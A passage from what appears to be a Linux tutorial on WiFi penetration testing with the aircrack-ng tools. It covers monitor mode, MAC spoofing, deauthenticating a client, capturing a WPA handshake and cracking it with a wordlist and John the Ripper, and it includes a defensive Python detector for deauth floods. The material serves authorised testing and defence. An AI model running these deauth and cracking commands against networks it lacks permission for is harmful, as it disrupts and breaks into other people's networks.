ath9k module. Firstly we need to stop all services that may interfere with the wireless interface - we can let airmon-ng tell us what it thinks might be troublesome and then stop these ourselves. Letting airmon-ng stop them (via airmon-ng kill) does not prevent other tools/monitors from restarting these processes. To start, disconnect from all wireless networks.

$ airmon-ng check
Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
769 NetworkManager
779 avahi-daemon
785 avahi-daemon
891 wpa_supplicant
$ service avahi-daemon stop
$ service NetworkManager stop
$ service wpa_supplicant stop
$ ifconfig wlo1 down && ifconfig -a
...
wlo1: flags=802 mtu 1500

Verify that the interface is down (there's no 'UP' flag).
At this point the wireless card is down and disconnected, and we need to put the card into monitor mode. To do this manually:

$ iwconfig wlo1 mode monitor

This leaves you with the same interface in the desired mode. To let airmon-ng handle this instead:

$ airmon-ng start wlo1
PHY Interface Driver Chipset
phy0 wlo1 ath9k Qualcomm Atheros AR9285 Wireless Network Adapter (PCI-Express) (rev 01)
(mac80211 monitor mode vif enabled for [phy0]wlo1 on [phy0]wlo1mon)
(mac80211 station mode vif disabled for [phy0]wlo1)
# verify monitor mode and also the interface name change
$ iwconfig
...
wlo1mon IEEE 802.11bgn Mode:Monitor Frequency:2.457 GHz Tx-Power=15 dBm
$ ifconfig -a
...
wlo1mon: flags=4163 mtu 1500
$ ifconfig wlo1mon down
$ macchanger -r wlo1mon
$ ifconfig wlo1mon up
At this stage we can use this newly created logical wlo1mon interface.

# see what is around, only associated clients
$ airodump-ng -a wlo1mon
# see only the specific bssid/essid on the given channel as found from above,
# writing out the capture details in /tmp/wifi.cap
$ airodump-ng -d <bssid> -c <channel> wlo1mon -w /tmp/wifi
# deauth
$ aireplay-ng --deauth 1 -a <bssid> -c <client mac>
# attempt to pen-test the handshake (if logged) using the dictionary file given by -w
# if the capture file contains more than one bssid, use -b to specify one for
# non-interactive use
$ aircrack-ng /tmp/wifi.cap -w /usr/share/dict/darkc0de

For long-running/resumable penetration testing, John the Ripper can be used in conjunction with aircrack-ng.

# set up john the ripper to feed aircrack-ng, but using a named session
$ john --session=foo --stdout --wordlist=/usr/share/dict/darkc0de | \
aircrack-ng -w - \
-b 00:11:22:33:44:55 /tmp/wifi.cap
# use 'q' or Ctrl-C to pause cracking
# restart cracking
$ john --restore=foo | \
aircrack-ng -w - \
-b 00:11:22:33:44:55 /tmp/wifi.cap
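The deauth step above sends deauthentication frames in the AP's name; on the wire that is a burst of deauth frames from a single BSSID, which is exactly what a wireless IDS looks for. As an added example (not code from the original post), the Python below parses raw 802.11 management frames and flags transmitters whose deauth/disassoc count inside a sliding window crosses a threshold. The sample frames are constructed inline, the 00:11:22:33:44:55 BSSID is the placeholder used on this page, and radiotap headers are assumed to have been stripped already.

```python
import struct
from collections import defaultdict

MGMT = 0                      # 802.11 frame type 0 = management
DEAUTH, DISASSOC = 12, 10     # management subtypes that tear down an association


def parse_frame(frame: bytes):
    """Return (type, subtype, transmitter, reason) from a raw 802.11 frame (radiotap
    header assumed stripped); reason is None unless it is a deauth/disassoc with a body."""
    if len(frame) < 24:
        raise ValueError("shorter than an 802.11 management header")
    fc = frame[0]                                  # low byte of Frame Control
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    addr2 = frame[10:16].hex(":")                  # transmitter; the AP's BSSID when spoofed
    reason = None
    if ftype == MGMT and subtype in (DEAUTH, DISASSOC) and len(frame) >= 26:
        reason = struct.unpack_from("<H", frame, 24)[0]
    return ftype, subtype, addr2, reason


def deauth_flood_sources(frames, window=1.0, threshold=3):
    """frames: iterable of (timestamp_seconds, raw_frame). Returns {transmitter: peak}
    for every transmitter that sent >= threshold deauth/disassoc frames inside any
    `window`-second span, which is the burst a deauth tool leaves behind."""
    times = defaultdict(list)
    for ts, raw in sorted(frames, key=lambda p: p[0]):
        ftype, subtype, addr2, _ = parse_frame(raw)
        if ftype == MGMT and subtype in (DEAUTH, DISASSOC):
            times[addr2].append(ts)
    flagged = {}
    for addr2, ts_list in times.items():
        lo, peak = 0, 0
        for hi, t in enumerate(ts_list):           # sliding window over sorted times
            while t - ts_list[lo] > window:
                lo += 1
            peak = max(peak, hi - lo + 1)
        if peak >= threshold:
            flagged[addr2] = peak
    return flagged


# Constructed sample frames, not a real capture. BSSID 00:11:22:33:44:55 is the
# placeholder from this page. Layout: FC(2) dur(2) addr1(6) addr2(6) addr3(6) seq(2) [reason(2)]
BSSID, BCAST, OTHER_AP, CLIENT = "001122334455", "ffffffffffff", "66778899aabb", "aabbccddeeff"
DEAUTH_FRAME = bytes.fromhex("c0000000" + BCAST + BSSID + BSSID + "0000" + "0700")   # reason 7
BEACON_FRAME = bytes.fromhex("80000000" + BCAST + BSSID + BSSID + "1000") + bytes(12)
DATA_FRAME = bytes.fromhex("08010000" + BSSID + CLIENT + BSSID + "2000")
LEGIT_DEAUTH = bytes.fromhex("c0000000" + CLIENT + OTHER_AP + OTHER_AP + "0000" + "0300")
SAMPLE = [(0.00, BEACON_FRAME), (0.05, DATA_FRAME), (0.10, LEGIT_DEAUTH)] + \
         [(0.20 + i * 0.01, DEAUTH_FRAME) for i in range(5)]       # 5 deauths in 50 ms
```

On a live monitor-mode interface you would feed `deauth_flood_sources` the frames of each capture window; the single disconnect from the other AP in the sample stays below the threshold while the five-frame burst is reported.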
To clean up the logical interfaces created and return the wireless interface for normal use:
$ airmon-ng stop wlo1
$ for i in wpa_supplicant avahi-daemon NetworkManager; do service $i start ; done
At this point bring back the connection in the NetworkManager and go about your day.